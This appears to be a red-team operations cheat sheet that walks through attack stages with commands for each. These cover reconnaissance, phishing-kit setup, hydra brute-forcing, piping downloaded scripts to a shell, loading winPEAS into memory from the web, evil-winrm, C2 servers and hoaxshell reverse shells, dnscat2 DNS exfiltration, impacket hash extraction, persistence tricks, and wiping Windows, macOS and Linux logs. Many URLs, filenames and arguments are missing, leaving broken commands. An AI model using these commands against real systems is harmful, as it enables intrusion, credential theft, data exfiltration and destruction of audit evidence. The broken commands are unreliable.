Red Team Operation Tools


This guide intent to provide a common set of tools that are for common use, to avoid the use of msfconsole, understanding the logic behind the process it’s fundamental to continue developing tools that can be used for defense purposes in a offensive context, this list includes different stages with their correlated use cases, the languages in use are the most general for high level programming, with a bit of low-level programming tricks.

1.0 Reconnaissance

We have two kinds of reconnaissance,but we are based on the digital context, the initial stage of the operation involves a detailed exploratory enumeration to analize the possible attack surface, using public information provided from the network, involves the identification of the services, ports available, and the response to complete the initial handshake from the client to the server, any piece of data that can be grabbed from the public information it’s essential to identify the best approach, complexity depends on the information available.

1.1 Reconnaissance Common Tools

Collecting Initial Information: You can use the whois command to gather information about a domain.

whois $domain

Identifying possible DNS record: You can use nslookup to take a look at the most commont registers associated with the domain or ip.

nslookup $domain

Determining the Network Range: You can use the ipcalc tool to determine the network range.

ipcalc $ip_address

Identifying Active Machines: You can use the ping command to identify active machines.

ping -c 4 $ip_address

Finding Access Points and Open Ports: You can use the nmap tool to find open ports.

nmap -Pn -sS $ip_address

Alternative with rustscan:

rustscan $ip_address --accessible --no-nmap --ulimit 5000

Fingerprinting the Operating System: You can use the nmap -O command to fingerprint the operating system.

nmap -O $ip_address

Alternative with rustscan:

rustscan $ip_address -O --ulimit 65535

Discovering Services on Ports: You can use the nmap -sV command to discover services on ports.

nmap -sV $ip_address -f --script vulners

Alternative with rustscan:

rustscan $ip_address -sV --accessible --ulimit 65535

Mapping the Network: You can use the traceroute command to map the network.

traceroute $ip_address

2.0 Initial Access

Identified the vulnerability surface, prepare a common set of possible exploits related to the service, versioning and/or OS, according to the resource available you can evaluate the possible exploit, once the details of the host are plenty identified, scanning and enumeration it’s where it resides the majority of the attack surface, obviously you still have some other options according to the type, butimplies a further analysis to some other relevant aspects that are part of particular use cases.

2.2 Initial Access Stage

Social Engineering Schemas
  • Phishing is a social engineering technique that involves sending fraudulent emails or messages to trick people into revealing sensitive information such as passwords, credit card numbers, or bank account details.
  • Pretexting is another social engineering scheme that uses a compelling story to convince a victim to offer help or respond with the requested information.
  • Baiting is a technique that involves leaving a malware-infected device in a public place to entice a victim to pick it up and plug it into their computer.
  • Quid pro quo is a technique that involves offering a benefit in exchange for sensitive information.
  • Tailgating is a technique that involves following someone into a restricted area without proper authorization.
  • Honeytrap is a technique that involves using a romantic or sexual relationship to extract sensitive information from a victim.
  • Scareware is a technique that involves tricking a victim into believing that their computer is infected with malware and then offering a solution for a fee.
  • Tech support scams are a technique that involves posing as a technical support representative and offering to fix a non-existent problem for a fee.
  • Watering hole attacks are a technique that involves compromising a website that is frequently visited by a target group and then infecting the visitors with malware.
  • Vishing is a technique that involves using voice communication to trick a victim into revealing sensitive information.
Code Exploitation
  • Exploitation: This involves taking advantage of vulnerabilities in systems, networks, or applications to gain unauthorized access, you can go in manual or automatic mode using directly the CVE’s reported or with some more complex tools.

2.3 Initiall Access Common Tools


git clone
./setup <root domain> <subdomain(s)> <root domain bool> <redirect url> <feed bool> <rid replacement> <blacklist bool>
 - root domain                     - the root domain to be used for the campaign
 - subdomains                      - a space separated list of evilginx2 subdomains, can be one if only one
 - root domain bool                - true or false to proxy root domain to evilginx2
 - redirect url                    - URL to redirect unauthorized Apache requests
 - feed bool                       - true or false if you plan to use the live feed
 - rid replacement                 - replace the gophish default "rid" in phishing URLs with this value
 - blacklist bool                  - true or false to use Apache blacklist
  ./ "accounts myaccount" false true user_id false

Social-Engineering Toolkit

git clone 
cd set
python install


sudo apt install hydra
hydra -L USER.TXT -P PASS.TXT http-post-form "login.php:username-^USER^&password=^PASS^:Error"
hydra -L USER.TXT -P PASS.TXT ssh


git clone
cd squarephish
pip install -r requirements.txt
usage: email [-h] [-c CONFIG] [--debug] [-e EMAIL]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging

  -e EMAIL, --email EMAIL
                        victim email address to send initial QR code email to
usage: server [-h] [-c CONFIG] [--debug]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging


wget -q && \
sudo bash ./

3.0 Lateral Movement (Staging)

After gaining initial access, the red team moves laterally across the network. They exploit vulnerabilities and use techniques like pass-the-hash, pass-the-ticket, or replay attacks to escalate privileges and gain deeper access.

3.1 Common Tools Used for Privilege Escalation


curl -L "" | sh


$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")


curl "" -Lo;chmod 700

4.0 Exploitation

The red team exploits the vulnerabilities they’ve found to control systems and gain further access.

This could involve installing malicious software or manipulating system configurations.

4.1 Common Tools Used for Exploitation


git clone
cd Responder
# Running the tool
./ [options]

# Typical usage
./ -I eth0 -wrf


sudo gem install winrm winrm-fs stringio logger fileutils
git clone
cd evil-winrm
# Connect to as Administrator with custom exe/ps1 download folder locations
evil-winrm  -i -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

# Upload local files to victim
upload local_filename
upload local_filename destination_filename

# Download remote files to local machine
download remote_filename
download remote_filename destination_filename

# Execute .Net assembly into victim memory
Invoke-Binary /opt/csharp/Rubeus.exe

# Load DLL library into victim memory
Dll-Loader -http

5.0 Control and Movement (Installation)

The Control and Movement stage in a red team operation typically involves establishing a command and control (C2) server to maintain control over the compromised systems1. They move around the network undetected, gaining more control.

5.1 C2 Tools


git clone
cd Havoc/Client
sudo ./teamserver server --profile ./profiles/havoc.yaotl -v --debug


git clone --recurse-submodules
cd Covenant/Covenant
~/Covenant/Covenant > dotnet run
warn: Microsoft.EntityFrameworkCore.Model.Validation[10400]
      Sensitive data logging is enabled. Log entries and exception messages may include sensitive application data, this mode should only be enabled during development.
WARNING: Running Covenant non-elevated. You may not have permission to start Listeners on low-numbered ports. Consider running Covenant elevated.
Covenant has started! Navigate to in a browser


mkdir /opt/merlin;cd /opt/merlin
7z x merlinServer-Linux-x64.7z
sudo ./merlinServer-Linux-x64


curl -sSf | sh
choosenim stable
git clone
cd client
nimble install -d
pip3 install -r server/requirements.txt
apt install mingw-w64
# Generate payloads
python .\ compile all

# Start server
python .\ server 


git clone
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x
# Payload that utilizes Invoke-Expression (default)
sudo python3 -s <your_ip>

# Payload that writes and executes commands from a file
sudo python3 -s <your_ip> -x "C:\Users\\\$env:USERNAME\.local\hack.ps1"

# Encrypted shell session with a trusted certificate
sudo python3 -s <> -t -c </path/to/cert.pem> -k <path/to/key.pem>

6.0 Actions on Target

The Actions on Target stage in a red team operation typically involves performing actions on the target that align with their objective1. This could involve data exfiltration, data destruction, or disruption of services.

6.1 Tools Used for Exfiltration

Dnscat2 Compile - Server

git clone
cd dnscat2/server/
gem install bundler
bundle install

Usage Server

# Establish the server
ruby ./dnscat2.rb DOMAIN.COM

Compile - Client

git clone
cd dnscat2/client/

Usage Client

# Establish the client with authoritative domain
./dnscat2 DOMAIN.COM

# Establish the client without authoritative domain
./dnscat2 --dns host=,port=0000

# Ping the server from the client
./dnscat --ping DOMAIN.COM

# Ping the server from the client, with custom dns resolver ip
./dnscat --dns server=,domain=DOMAIN.COM --ping

Usage Tunnels

# (After establishing the client) You can open a new tunnelled port
listen [lhost:]lport rhost:rport

# Forward ssh connections through the dnscat2 client to an internal device


git clone
# Cloakify some text
python3 TEXT.txt ciphers/desserts.ciph > TEXT.cloaked

# De-Cloakify the text
python3 TEXT.cloaked ciphers/desserts.ciph

7.0 Persistence and Egress (Actions on Objectives)

The Persistence and Egress stage in a red team operation typically involves establishing methods to maintain access (persistence) and safely remove themselves from the network (egress), all while achieving their objectives. Persistence is a technique widely used by red teaming professionals and adversaries to maintain a connection with target systems after interruptions that can cut off their access1. In this context, persistence includes access and configuration to maintain the initial foothold of the systems.

The red team establishes methods to maintain access (persistence) and safely remove themselves from the network (egress), all while achieving their objectives, each of these stages is designed to mimic the tactics, techniques, and procedures (TTPs) of real-world attackers, providing the most realistic test of an organization’s defenses, select according to your requirements.

7.1 Techniques that are commonly used for persistence

  • Playing with a DLL proxy: The DLL proxy technique is commonly used for traffic interception, but it can also be a good friend for persistence1. In short, a portable executable file (program.exe) can call a legitimate.dll file with some exported functions. To perform this technique, we need to create a target DLL with the same exported functions, rename it to the original name, introduce the customized code, and forward the execution to the original DLL (legitimate.dll).
  • The dratted scheduled task: One of the most famous persistence techniques is creating a scheduled task that will execute within a time range to execute the target code. The following line can create a scheduled task that will execute every minute.
  • Poisoning .lnk Shortcuts: A common way of creating persistence on a target machine is poisoning a simple shortcut1. By changing the “Target” field, we can tell the shortcut what it should execute.

7.2 Common tools Used for Persistence


git clone
cd Empire
sudo ./setup/
# Start Empire

# List live agents
list agents

# List live listeners
list listeners


python3 -m pip install impacket
# Extract NTLM hashes with local files -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

# Gets a list of the sessions opened at the remote hosts domain/user:password -target

# Retrieves the MSSQL instances names from the target host.

# This script will gather data about the domain's users and their corresponding email addresses. domain/user:password@IP

7.3 Common Tools for Log Cleaning

Here are some command-line tools and commands that can be used to manage and clean log files on different operating systems:


Console: This is a built-in macOS application that displays macOS system logs.

open /Applications/Utilities/

syslog: This command shows system messages.


log show: This command shows logs collected by the logging system.

log show

log stream: This command shows real-time system log messages.

log stream

log erase: This command erases the collected system logs.

sudo log erase --all

rm: This command removes files or directories.

rm ~/Library/Logs/logfile.log

find: This command can be used to find and delete files older than a certain number of days.

find /var/log -name "*.log" -type f -mtime +7 -exec rm -f {} \;

newsyslog: This command can be used to rotate, compress, and remove log files.

sudo newsyslog

Periodic scripts: macOS runs daily, weekly, and monthly maintenance scripts that clean up system logs and temporary files.

sudo periodic daily weekly monthly

AppleJack: This is a user-friendly system maintenance tool.

AppleJack needs to be downloaded and installed manually.

sudo applejack

In Windows, you can use the wevtutil command to clear event logs. Here’s an example of how you might use it:

for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

This command gets a list of all event logs using wevtutil.exe el and then clears each log.

Event Viewer: This is a Microsoft Management Console (MMC) snap-in that enables you to browse and manage event logs.


wevtutil: This command line utility can be used to manage event logs and event publishers.

wevtutil el

PowerShell: This task-based command-line shell and scripting language can be used to manage logs.

Get-EventLog -LogName Application

sfc: This command scans the integrity of all protected system files and replaces incorrect versions with correct Microsoft versions.

sfc /scannow

chkdsk: This command checks a disk and displays a status report.


systeminfo: This command displays detailed configuration information about a computer and its operating system.


driverquery: This command enables an administrator to display a list of installed device drivers and their properties.


tasklist: This command displays a list of applications, services, and the Process ID (PID) currently running on either a local or a remote computer.


netstat: This command displays active TCP connections, ports on which the computer is listening, Ethernet statistics, the IP routing table, IPv4 statistics (for the IP, ICMP, TCP, and UDP protocols), and IPv6 statistics (for the IPv6, ICMPv6, TCP over IPv6, and UDP over IPv6 protocols).


gpresult: This command displays the Resultant Set of Policy (RSoP) information for a remote user and computer.

gpresult /h report.html

dmesg: This command prints or controls the kernel ring buffer.


journalctl: This command is used to query the contents of the systemd journal.


You can also use the journalctl command to clear systemd journal logs:

sudo journalctl --rotate --vacuum-size=500M

This command rotates the logs (i.e., starts a new log file) and then removes old log files until the total size of the log files is under 500MB.

logrotate: This command is designed to ease administration of systems that generate large numbers of log files.


lastlog: This command reports the most recent login of all users or of a given user.


last: This command shows listing of last logged in users.


who: This command shows who is logged on.


w: This command shows who is logged on and what they are doing.


users: This command prints the user names of users currently logged in to the current host.


utmpdump: This command dumps UTMP and WTMP files in raw format.

utmpdump /var/log/wtmp

faillog: This command displays faillog records or sets login failure limits.


truncate: This command reduces the size of the specified log file to 0, effectively clearing it.

truncate --size 0 /var/log/syslog

8.0 Disclaimer

DISCLAIMER: The information and code provided here are intended for educational and informational purposes only. The user assumes full responsibility for the use of this information and code. The provider of this information and code makes no representations or warranties, express or implied, about the completeness, accuracy, reliability, suitability, or availability of the information and code provided. Any reliance you place on such information and any use of this code is therefore strictly at your own risk. In no event will the provider be liable for any loss or damage including without limitation, indirect or consequential loss or damage, arising out of, or in connection with, the use of this information and code.